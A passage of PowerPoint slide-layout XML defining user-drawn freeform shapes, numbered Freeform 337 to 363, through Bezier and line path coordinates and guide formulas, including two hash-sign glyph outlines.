                      <a:pt x="126" y="146"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="127" y="143"/>
                      <a:pt x="128" y="140"/>
                      <a:pt x="132" y="139"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="137" y="138"/>
                      <a:pt x="141" y="139"/>
                      <a:pt x="146" y="141"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="144" y="139"/>
                      <a:pt x="142" y="138"/>
                      <a:pt x="139" y="137"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="145" y="120"/>
                      <a:pt x="135" y="98"/>
                      <a:pt x="126" y="92"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="130" y="98"/>
                      <a:pt x="134" y="104"/>
                      <a:pt x="136" y="111"/>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5"/>
                      <a:pt x="124" y="108"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="122" y="103"/>
                      <a:pt x="121" y="99"/>
                      <a:pt x="117" y="95"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="95"/>
                      <a:pt x="117" y="95"/>
                      <a:pt x="116" y="94"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="115" y="87"/>
                      <a:pt x="112" y="79"/>
                      <a:pt x="107" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="105" y="71"/>
                      <a:pt x="105" y="67"/>
                      <a:pt x="105" y="64"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="106" y="63"/>
                      <a:pt x="106" y="61"/>
                      <a:pt x="106" y="59"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="107" y="56"/>
                      <a:pt x="106" y="55"/>
                      <a:pt x="103" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="53"/>
                      <a:pt x="97" y="51"/>
                      <a:pt x="94" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="49"/>
                      <a:pt x="90" y="47"/>
                      <a:pt x="91" y="45"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="44"/>
                      <a:pt x="91" y="42"/>
                      <a:pt x="91" y="41"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="92" y="38"/>
                      <a:pt x="94" y="37"/>
                      <a:pt x="97" y="37"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="99" y="38"/>
                      <a:pt x="100" y="39"/>
                      <a:pt x="101" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="43"/>
                      <a:pt x="103" y="45"/>
                      <a:pt x="102" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="49"/>
                      <a:pt x="101" y="50"/>
                      <a:pt x="102" y="51"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="52"/>
                      <a:pt x="106" y="51"/>
                      <a:pt x="107" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="107" y="44"/>
                      <a:pt x="107" y="40"/>
                      <a:pt x="105" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="32"/>
                      <a:pt x="99" y="30"/>
                      <a:pt x="96" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="31"/>
                      <a:pt x="87" y="34"/>
                      <a:pt x="87" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="86" y="39"/>
                      <a:pt x="86" y="41"/>
                      <a:pt x="86" y="42"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="86" y="44"/>
                      <a:pt x="87" y="46"/>
                      <a:pt x="87" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="46"/>
                      <a:pt x="82" y="46"/>
                      <a:pt x="80" y="46"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="80" y="46"/>
                      <a:pt x="80" y="46"/>
                      <a:pt x="79" y="46"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="46"/>
                      <a:pt x="77" y="46"/>
                      <a:pt x="77" y="45"/>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1"/>
                      <a:pt x="67" y="52"/>
                      <a:pt x="67" y="52"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="51"/>
                      <a:pt x="69" y="51"/>
                      <a:pt x="69" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="49"/>
                      <a:pt x="67" y="48"/>
                      <a:pt x="67" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="45"/>
                      <a:pt x="65" y="43"/>
                      <a:pt x="66" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="38"/>
                      <a:pt x="70" y="37"/>
                      <a:pt x="72" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="74" y="40"/>
                      <a:pt x="74" y="42"/>
                      <a:pt x="75" y="45"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75" y="46"/>
                      <a:pt x="74" y="48"/>
                      <a:pt x="73" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="49"/>
                      <a:pt x="72" y="49"/>
                      <a:pt x="72" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="51"/>
                      <a:pt x="68" y="53"/>
                      <a:pt x="66" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="55"/>
                      <a:pt x="64" y="56"/>
                      <a:pt x="64" y="57"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="58"/>
                      <a:pt x="64" y="59"/>
                      <a:pt x="65" y="60"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="61"/>
                      <a:pt x="67" y="62"/>
                      <a:pt x="68" y="63"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="66"/>
                      <a:pt x="74" y="67"/>
                      <a:pt x="77" y="67"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="82" y="67"/>
                      <a:pt x="86" y="65"/>
                      <a:pt x="90" y="64"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="94" y="63"/>
                      <a:pt x="98" y="62"/>
                      <a:pt x="101" y="59"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="58"/>
                      <a:pt x="102" y="58"/>
                      <a:pt x="102" y="59"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="59"/>
                      <a:pt x="103" y="60"/>
                      <a:pt x="103" y="61"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="61"/>
                      <a:pt x="102" y="61"/>
                      <a:pt x="101" y="62"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="96" y="64"/>
                      <a:pt x="91" y="66"/>
                      <a:pt x="86" y="68"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="82" y="69"/>
                      <a:pt x="78" y="70"/>
                      <a:pt x="74" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="69"/>
                      <a:pt x="72" y="69"/>
                      <a:pt x="71" y="69"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="73" y="45"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="44"/>
                      <a:pt x="73" y="42"/>
                      <a:pt x="71" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="40"/>
                      <a:pt x="71" y="40"/>
                      <a:pt x="70" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="41"/>
                      <a:pt x="70" y="41"/>
                      <a:pt x="70" y="41"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="42"/>
                      <a:pt x="71" y="43"/>
                      <a:pt x="71" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="45"/>
                      <a:pt x="71" y="46"/>
                      <a:pt x="73" y="45"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="97" y="40"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="99" y="41"/>
                      <a:pt x="99" y="42"/>
                      <a:pt x="100" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="44"/>
                      <a:pt x="101" y="43"/>
                      <a:pt x="101" y="43"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="42"/>
                      <a:pt x="100" y="41"/>
                      <a:pt x="99" y="40"/>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Freeform 337"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4080" y="1518"/>
                <a:ext cx="3" cy="4"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 2 w 2"/>
                  <a:gd name="T1" fmla="*/ 0 h 3"/>
                  <a:gd name="T2" fmla="*/ 1 w 2"/>
                  <a:gd name="T3" fmla="*/ 2 h 3"/>
                  <a:gd name="T4" fmla="*/ 0 w 2"/>
                  <a:gd name="T5" fmla="*/ 3 h 3"/>
                  <a:gd name="T6" fmla="*/ 0 w 2"/>
                  <a:gd name="T7" fmla="*/ 1 h 3"/>
                  <a:gd name="T8" fmla="*/ 2 w 2"/>
                  <a:gd name="T9" fmla="*/ 0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1"/>
                      <a:pt x="1" y="2"/>
                      <a:pt x="1" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="2"/>
                      <a:pt x="0" y="2"/>
                      <a:pt x="0" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="2"/>
                      <a:pt x="0" y="1"/>
                      <a:pt x="0" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0"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Freeform 338"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4093" y="1518"/>
                <a:ext cx="3" cy="3"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 3"/>
                  <a:gd name="T1" fmla="*/ 0 h 2"/>
                  <a:gd name="T2" fmla="*/ 3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Freeform 339"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2044"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Freeform 340"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2193"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Freeform 341"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2388"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Freeform 342"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2813"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Freeform 343"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2960"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Freeform 344"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3159"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Freeform 345"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3308"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Freeform 346"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3456" y="1833"/>
                <a:ext cx="155"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Freeform 347"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3654"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Freeform 348"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="380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Freeform 349"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3996"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Freeform 350"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="419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Freeform 351"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4389"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Freeform 352"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="453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2"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Freeform 353"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4723" y="1838"/>
                <a:ext cx="187" cy="219"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 187 w 187"/>
                  <a:gd name="T1" fmla="*/ 67 h 219"/>
                  <a:gd name="T2" fmla="*/ 184 w 187"/>
                  <a:gd name="T3" fmla="*/ 84 h 219"/>
                  <a:gd name="T4" fmla="*/ 141 w 187"/>
                  <a:gd name="T5" fmla="*/ 84 h 219"/>
                  <a:gd name="T6" fmla="*/ 130 w 187"/>
                  <a:gd name="T7" fmla="*/ 135 h 219"/>
                  <a:gd name="T8" fmla="*/ 176 w 187"/>
                  <a:gd name="T9" fmla="*/ 135 h 219"/>
                  <a:gd name="T10" fmla="*/ 173 w 187"/>
                  <a:gd name="T11" fmla="*/ 153 h 219"/>
                  <a:gd name="T12" fmla="*/ 126 w 187"/>
                  <a:gd name="T13" fmla="*/ 153 h 219"/>
                  <a:gd name="T14" fmla="*/ 112 w 187"/>
                  <a:gd name="T15" fmla="*/ 219 h 219"/>
                  <a:gd name="T16" fmla="*/ 91 w 187"/>
                  <a:gd name="T17" fmla="*/ 219 h 219"/>
                  <a:gd name="T18" fmla="*/ 106 w 187"/>
                  <a:gd name="T19" fmla="*/ 153 h 219"/>
                  <a:gd name="T20" fmla="*/ 64 w 187"/>
                  <a:gd name="T21" fmla="*/ 153 h 219"/>
                  <a:gd name="T22" fmla="*/ 50 w 187"/>
                  <a:gd name="T23" fmla="*/ 219 h 219"/>
                  <a:gd name="T24" fmla="*/ 29 w 187"/>
                  <a:gd name="T25" fmla="*/ 219 h 219"/>
                  <a:gd name="T26" fmla="*/ 42 w 187"/>
                  <a:gd name="T27" fmla="*/ 153 h 219"/>
                  <a:gd name="T28" fmla="*/ 0 w 187"/>
                  <a:gd name="T29" fmla="*/ 153 h 219"/>
                  <a:gd name="T30" fmla="*/ 2 w 187"/>
                  <a:gd name="T31" fmla="*/ 135 h 219"/>
                  <a:gd name="T32" fmla="*/ 47 w 187"/>
                  <a:gd name="T33" fmla="*/ 135 h 219"/>
                  <a:gd name="T34" fmla="*/ 57 w 187"/>
                  <a:gd name="T35" fmla="*/ 84 h 219"/>
                  <a:gd name="T36" fmla="*/ 11 w 187"/>
                  <a:gd name="T37" fmla="*/ 84 h 219"/>
                  <a:gd name="T38" fmla="*/ 14 w 187"/>
                  <a:gd name="T39" fmla="*/ 67 h 219"/>
                  <a:gd name="T40" fmla="*/ 61 w 187"/>
                  <a:gd name="T41" fmla="*/ 67 h 219"/>
                  <a:gd name="T42" fmla="*/ 74 w 187"/>
                  <a:gd name="T43" fmla="*/ 0 h 219"/>
                  <a:gd name="T44" fmla="*/ 95 w 187"/>
                  <a:gd name="T45" fmla="*/ 0 h 219"/>
                  <a:gd name="T46" fmla="*/ 81 w 187"/>
                  <a:gd name="T47" fmla="*/ 67 h 219"/>
                  <a:gd name="T48" fmla="*/ 123 w 187"/>
                  <a:gd name="T49" fmla="*/ 67 h 219"/>
                  <a:gd name="T50" fmla="*/ 137 w 187"/>
                  <a:gd name="T51" fmla="*/ 0 h 219"/>
                  <a:gd name="T52" fmla="*/ 158 w 187"/>
                  <a:gd name="T53" fmla="*/ 0 h 219"/>
                  <a:gd name="T54" fmla="*/ 145 w 187"/>
                  <a:gd name="T55" fmla="*/ 67 h 219"/>
                  <a:gd name="T56" fmla="*/ 187 w 187"/>
                  <a:gd name="T57" fmla="*/ 67 h 219"/>
                  <a:gd name="T58" fmla="*/ 120 w 187"/>
                  <a:gd name="T59" fmla="*/ 84 h 219"/>
                  <a:gd name="T60" fmla="*/ 78 w 187"/>
                  <a:gd name="T61" fmla="*/ 84 h 219"/>
                  <a:gd name="T62" fmla="*/ 67 w 187"/>
                  <a:gd name="T63" fmla="*/ 135 h 219"/>
                  <a:gd name="T64" fmla="*/ 109 w 187"/>
                  <a:gd name="T65" fmla="*/ 135 h 219"/>
                  <a:gd name="T66" fmla="*/ 120 w 187"/>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19">
                    <a:moveTo>
                      <a:pt x="187" y="67"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="184" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="187" y="67"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="120" y="84"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="78" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12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Freeform 354"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4940"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Freeform 355"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5137"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Freeform 356"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5286" y="1833"/>
                <a:ext cx="154"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Freeform 357"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5483"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Freeform 358"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="563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Freeform 359"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5828"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Freeform 360"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="597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Freeform 361"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6172"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Freeform 362"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6356" y="1838"/>
                <a:ext cx="189" cy="219"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 189 w 189"/>
                  <a:gd name="T1" fmla="*/ 67 h 219"/>
                  <a:gd name="T2" fmla="*/ 185 w 189"/>
                  <a:gd name="T3" fmla="*/ 84 h 219"/>
                  <a:gd name="T4" fmla="*/ 142 w 189"/>
                  <a:gd name="T5" fmla="*/ 84 h 219"/>
                  <a:gd name="T6" fmla="*/ 131 w 189"/>
                  <a:gd name="T7" fmla="*/ 135 h 219"/>
                  <a:gd name="T8" fmla="*/ 178 w 189"/>
                  <a:gd name="T9" fmla="*/ 135 h 219"/>
                  <a:gd name="T10" fmla="*/ 174 w 189"/>
                  <a:gd name="T11" fmla="*/ 153 h 219"/>
                  <a:gd name="T12" fmla="*/ 128 w 189"/>
                  <a:gd name="T13" fmla="*/ 153 h 219"/>
                  <a:gd name="T14" fmla="*/ 113 w 189"/>
                  <a:gd name="T15" fmla="*/ 219 h 219"/>
                  <a:gd name="T16" fmla="*/ 92 w 189"/>
                  <a:gd name="T17" fmla="*/ 219 h 219"/>
                  <a:gd name="T18" fmla="*/ 107 w 189"/>
                  <a:gd name="T19" fmla="*/ 153 h 219"/>
                  <a:gd name="T20" fmla="*/ 64 w 189"/>
                  <a:gd name="T21" fmla="*/ 153 h 219"/>
                  <a:gd name="T22" fmla="*/ 51 w 189"/>
                  <a:gd name="T23" fmla="*/ 219 h 219"/>
                  <a:gd name="T24" fmla="*/ 30 w 189"/>
                  <a:gd name="T25" fmla="*/ 219 h 219"/>
                  <a:gd name="T26" fmla="*/ 44 w 189"/>
                  <a:gd name="T27" fmla="*/ 153 h 219"/>
                  <a:gd name="T28" fmla="*/ 0 w 189"/>
                  <a:gd name="T29" fmla="*/ 153 h 219"/>
                  <a:gd name="T30" fmla="*/ 3 w 189"/>
                  <a:gd name="T31" fmla="*/ 135 h 219"/>
                  <a:gd name="T32" fmla="*/ 47 w 189"/>
                  <a:gd name="T33" fmla="*/ 135 h 219"/>
                  <a:gd name="T34" fmla="*/ 58 w 189"/>
                  <a:gd name="T35" fmla="*/ 84 h 219"/>
                  <a:gd name="T36" fmla="*/ 12 w 189"/>
                  <a:gd name="T37" fmla="*/ 84 h 219"/>
                  <a:gd name="T38" fmla="*/ 15 w 189"/>
                  <a:gd name="T39" fmla="*/ 67 h 219"/>
                  <a:gd name="T40" fmla="*/ 62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59 w 189"/>
                  <a:gd name="T53" fmla="*/ 0 h 219"/>
                  <a:gd name="T54" fmla="*/ 145 w 189"/>
                  <a:gd name="T55" fmla="*/ 67 h 219"/>
                  <a:gd name="T56" fmla="*/ 189 w 189"/>
                  <a:gd name="T57" fmla="*/ 67 h 219"/>
                  <a:gd name="T58" fmla="*/ 122 w 189"/>
                  <a:gd name="T59" fmla="*/ 84 h 219"/>
                  <a:gd name="T60" fmla="*/ 79 w 189"/>
                  <a:gd name="T61" fmla="*/ 84 h 219"/>
                  <a:gd name="T62" fmla="*/ 68 w 189"/>
                  <a:gd name="T63" fmla="*/ 135 h 219"/>
                  <a:gd name="T64" fmla="*/ 111 w 189"/>
                  <a:gd name="T65" fmla="*/ 135 h 219"/>
                  <a:gd name="T66" fmla="*/ 122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4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="67"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="122" y="84"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="79" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12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Freeform 363"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
